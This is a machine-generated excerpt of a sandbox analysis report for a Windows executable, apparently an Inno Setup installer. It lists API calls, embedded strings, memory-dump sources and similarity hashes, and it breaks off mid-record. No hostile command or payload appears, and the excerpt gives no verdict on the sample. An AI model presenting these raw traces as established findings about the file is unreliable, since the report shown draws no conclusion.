                                                              control_flow_graph 2688 42f570-42f57a 2689 42f584-42f5c1 call 402b30 GetActiveWindow GetFocus call 41eeb4 2688->2689 2690 42f57c-42f57f call 402d30 2688->2690 2696 42f5d3-42f5db 2689->2696 2697 42f5c3-42f5cd RegisterClassA 2689->2697 2690->2689 2698 42f662-42f67e SetFocus call 403400 2696->2698 2699 42f5e1-42f612 CreateWindowExA 2696->2699 2697->2696 2699->2698 2700 42f614-42f658 call 42428c call 403738 CreateWindowExA 2699->2700 2700->2698 2707 42f65a-42f65d ShowWindow 2700->2707 2707->2698
                                                              APIs
                                                              • GetActiveWindow.USER32 ref: 0042F59F
                                                              • GetFocus.USER32 ref: 0042F5A7
                                                              • RegisterClassA.USER32(004997AC), ref: 0042F5C8
                                                              • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F69C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F606
                                                              • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F64C
                                                              • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F65D
                                                              • SetFocus.USER32(00000000,00000000,0042F67F,?,?,?,00000001,00000000,?,00458696,00000000,0049B628), ref: 0042F664
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                              • String ID: TWindowDisabler-Window
                                                              • API String ID: 3167913817-1824977358
                                                              • Opcode ID: b2433ce4ffe1b1f942b14f487daced2f86516ced4add7bc415a00a8a37101852
                                                              • Instruction ID: 092f1afd63313efa57bcf667ad1f00c9caddf595d34af2871f870ebe591ae418
                                                              • Opcode Fuzzy Hash: b2433ce4ffe1b1f942b14f487daced2f86516ced4add7bc415a00a8a37101852
                                                              • Instruction Fuzzy Hash: 20219F70740710BAE710EF62AD03F1A76A8EB04B04FA1413AF504AB2D1D7B96D5586ED
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 004531FC
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453202
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 00453216
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045321C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                              • API String ID: 1646373207-2130885113
                                                              • Opcode ID: c24ac2f37dcd2c5f05e81832aa1b687e7eaf3d26bd242744e205e68ddaa02280
                                                              • Instruction ID: 5e931287d6eebe3694b70f0ad3549e6df422da746536320e83a51589c54bb73f
                                                              • Opcode Fuzzy Hash: c24ac2f37dcd2c5f05e81832aa1b687e7eaf3d26bd242744e205e68ddaa02280
                                                              • Instruction Fuzzy Hash: 5B017570240B45AFD711AF73AD02F167658E705B57F6044BBFC0096286D77C8A088EAD
                                                              APIs
                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047C973,?,?,00000000,0049B628,00000000,00000000,?,00497F09,00000000,004980B2,?,00000000), ref: 0047C893
                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,0047C973,?,?,00000000,0049B628,00000000,00000000,?,00497F09,00000000,004980B2,?,00000000), ref: 0047C89C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup
                                                              • API String ID: 1375471231-1421604804
                                                              • Opcode ID: 20565183d399805a0260eecee190a14380a82a44589236b9bd3091d604848e13
                                                              • Instruction ID: 2e7cf1fa8793a22cdcb7cccf6aa375e82942df810c5d1ff78a46bc34c798803d
                                                              • Opcode Fuzzy Hash: 20565183d399805a0260eecee190a14380a82a44589236b9bd3091d604848e13
                                                              • Instruction Fuzzy Hash: 65411474A001099BDB00EFA5D8C2ADEB7B9EB44309F50857BE91477392DB389E058B69
                                                              APIs
                                                              • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430958
                                                              • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430967
                                                              • GetCurrentThreadId.KERNEL32 ref: 00430981
                                                              • GlobalAddAtomA.KERNEL32(00000000), ref: 004309A2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                              • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                              • API String ID: 4130936913-2943970505
                                                              • Opcode ID: 78856a4ce41e30232f7250bb6d0de12fd7185dbc6f50e75004d9522d85a73123
                                                              • Instruction ID: fe08fc0df2a0eca0a869f0df0621173a2940aa0bc2523ddfe777e35bb070d714
                                                              • Opcode Fuzzy Hash: 78856a4ce41e30232f7250bb6d0de12fd7185dbc6f50e75004d9522d85a73123
                                                              • Instruction Fuzzy Hash: 30F082B0958340CEE300EB25994271A7BE0EF58318F00467FF498A63E2D7399900CB5F
                                                              APIs
                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,004725B5,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951), ref: 00472591
                                                              • FindClose.KERNEL32(000000FF,004725BC,004725B5,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951,?), ref: 004725AF
                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,004726D7,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951), ref: 004726B3
                                                              • FindClose.KERNEL32(000000FF,004726DE,004726D7,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951,?), ref: 004726D1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileNext
                                                              • String ID: "*G$"*G
                                                              • API String ID: 2066263336-450946878
                                                              • Opcode ID: 731f9d001d9b8b0b4781793d64753bce726ea54262d8f8a63928cd792b5168e5
                                                              • Instruction ID: 3872decae14ce2498a692a517acaa1cf84d86a609609514027ee2c14d85ef847
                                                              • Opcode Fuzzy Hash: 731f9d001d9b8b0b4781793d64753bce726ea54262d8f8a63928cd792b5168e5
                                                              • Instruction Fuzzy Hash: 6CB13E7490424DAFCF11DFA5C981ADEBBB9FF49304F5081AAE808B3251D7789A46CF58
                                                              APIs
                                                              • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00455218,00455218,00000031,00455218,00000000), ref: 004551A6
                                                              • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00455218,00455218,00000031,00455218), ref: 004551B3
                                                                • Part of subcall function 00454F68: WaitForInputIdle.USER32(00000001,00000032), ref: 00454F94
                                                                • Part of subcall function 00454F68: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00454FB6
                                                                • Part of subcall function 00454F68: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454FC5
                                                                • Part of subcall function 00454F68: CloseHandle.KERNEL32(00000001,00454FF2,00454FEB,?,00000031,00000080,00000000,?,?,0045534B,00000080,0000003C,00000000,00455361), ref: 00454FE5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                              • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                              • API String ID: 854858120-615399546
                                                              • Opcode ID: 2fd3dae9d75497d44160d5c5904f03d0a65dfeb3736f9e9635dbb4a286748838
                                                              • Instruction ID: 314af404618b4f06b129018ed763823481dfe4f790e250d6c958622b2bfe97d6
                                                              • Opcode Fuzzy Hash: 2fd3dae9d75497d44160d5c5904f03d0a65dfeb3736f9e9635dbb4a286748838
                                                              • Instruction Fuzzy Hash: 12515A30A0074DABDB11EF95C892BEEBBB9AF44705F50407BB804B7282D7785A49CB59
                                                              APIs
                                                              • LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                              • OemToCharA.USER32(?,?), ref: 0042376C
                                                              • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Char$FileIconLoadLowerModuleName
                                                              • String ID: 2$MAINICON
                                                              • API String ID: 3935243913-3181700818
                                                              • Opcode ID: 751299a27fb29773dc730031d78ffe09a982dc500c90bea8db2431fb333e9452
                                                              • Instruction ID: fd9f9c5161a85cdd37c149357dc6ae372d2e201a3957992c444bec056041847b
                                                              • Opcode Fuzzy Hash: 751299a27fb29773dc730031d78ffe09a982dc500c90bea8db2431fb333e9452
                                                              • Instruction Fuzzy Hash: 89319270A042549ADF14EF2998857C67BE8AF14308F4441BAE844DB393D7BED988CB99
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
                                                              • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
                                                              • GetCurrentThreadId.KERNEL32 ref: 00418F89
                                                              • GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA
                                                                • Part of subcall function 004230D8: 73A1A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                • Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                • Part of subcall function 004230D8: 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                • Part of subcall function 004230D8: 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                • Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                • Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                • Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
                                                                • Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                • Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                • Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A24620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                              • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                              • API String ID: 3864787166-2767913252
                                                              • Opcode ID: cfc1acdfd4e85ff2d131a9f4d40f785a7290ab9aa4a67b06bd919a79267a8431
                                                              • Instruction ID: 147b0fd3ac44816fa50e213e98ef70cab9cb63b371fef283777c7ccc396f8742
                                                              • Opcode Fuzzy Hash: cfc1acdfd4e85ff2d131a9f4d40f785a7290ab9aa4a67b06bd919a79267a8431
                                                              • Instruction Fuzzy Hash: BB112EB06142409AC740FF76A94265A7BE1DB64318F40843FF448EB2D1DB7D99448B5F
                                                              APIs
                                                              • SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
                                                              • GetWindowLongA.USER32(?,000000F0), ref: 0041367F
                                                              • GetWindowLongA.USER32(?,000000F4), ref: 00413691
                                                              • SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
                                                              • SetPropA.USER32(?,00000000,00000000), ref: 004136BB
                                                              • SetPropA.USER32(?,00000000,00000000), ref: 004136D2
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$Prop
                                                              • String ID:
                                                              • API String ID: 3887896539-0
                                                              • Opcode ID: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                              • Instruction ID: 955d73ee8c9e489f8eb805393a0cdbf9fe7b6d9765079e051d97cf620cdedb95
                                                              • Opcode Fuzzy Hash: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                              • Instruction Fuzzy Hash: D811C975500248BFDB00DF9DDC84EDA3BE8EB19364F144666B918DB2A1D738DD908BA8
                                                              APIs
                                                                • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045585B,?,00000000,0045589B), ref: 004557A1
                                                              Strings
                                                              • WININIT.INI, xrefs: 004557D0
                                                              • PendingFileRenameOperations, xrefs: 00455740
                                                              • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455724
                                                              • PendingFileRenameOperations2, xrefs: 00455770
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen
                                                              • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                              • API String ID: 47109696-2199428270
                                                              • Opcode ID: e596244eac119ca3746a9610a602a7bde82fbf058035d963e90b8d4b6900848c
                                                              • Instruction ID: 5ff55985f0d79b0cf99ef6a0ef0ae12f56fe6c83aec1de8438bfb9543cdeefde
                                                              • Opcode Fuzzy Hash: e596244eac119ca3746a9610a602a7bde82fbf058035d963e90b8d4b6900848c
                                                              • Instruction Fuzzy Hash: BB519670E006089FDB10FF61DC51AEEB7B9EF45305F50857BE804A7292DB7CAA49CA58
                                                              APIs
                                                              • EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                              • GetWindow.USER32(?,00000003), ref: 00423ACD
                                                              • GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                              • SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Window$EnumLongWindows
                                                              • String ID: lAB
                                                              • API String ID: 4191631535-3476862382
                                                              • Opcode ID: 5f05c18b5ef50282e2e62587cef3ede3e0bfa46b8e8bdba155623c697b582535
                                                              • Instruction ID: 20c146af1fa2ebf8fe73d6cd857ce812a249192cdefe4c29475ac4fba41381ea
                                                              • Opcode Fuzzy Hash: 5f05c18b5ef50282e2e62587cef3ede3e0bfa46b8e8bdba155623c697b582535
                                                              • Instruction Fuzzy Hash: 4E115E70700610ABDB109F28DD85F6A77E8EB04725F50026AF9A49B2E7C378ED40CB59
                                                              APIs
                                                              • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE60
                                                              • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFFB,00000000,0042E013,?,?,?,?,00000006,?,00000000,0049722D), ref: 0042DE7B
                                                              • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressDeleteHandleModuleProc
                                                              • String ID: RegDeleteKeyExA$advapi32.dll
                                                              • API String ID: 588496660-1846899949
                                                              • Opcode ID: 1efadd4f9f0c0ea65d6d931b2dfdd832bea74e7cc2ac9dff72f3f3dd5b00937e
                                                              • Instruction ID: 51feda2b41882886fdb541a0ee71ee95ad591444612597d61ea777cd3c773b46
                                                              • Opcode Fuzzy Hash: 1efadd4f9f0c0ea65d6d931b2dfdd832bea74e7cc2ac9dff72f3f3dd5b00937e
                                                              • Instruction Fuzzy Hash: 3EE06DB1B41B30AAD72032A57C8AB932629DB75326F658537F005AE1D183FC2C50CE9D
                                                              Strings
                                                              • NextButtonClick, xrefs: 0046BF84
                                                              • PrepareToInstall failed: %s, xrefs: 0046C14B
                                                              • Need to restart Windows? %s, xrefs: 0046C172
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                              • API String ID: 0-2329492092
                                                              • Opcode ID: 221dd23b7cfc17f66ca7de120067e16c15a7d044e53f2a8722f04dc11adac0dc
                                                              • Instruction ID: 1202268df95ceb0eead913a0caf14b6b564ec17a2e6689a58d7256d675820d07
                                                              • Opcode Fuzzy Hash: 221dd23b7cfc17f66ca7de120067e16c15a7d044e53f2a8722f04dc11adac0dc
                                                              • Instruction Fuzzy Hash: 64C16D34A04208DFCB00DB98C9D5AEE77B5EF05304F1444B7E840AB362D778AE41DBAA
                                                              APIs
                                                              • SetActiveWindow.USER32(?,?,00000000,00482E54), ref: 00482C30
                                                              • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00482CC5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
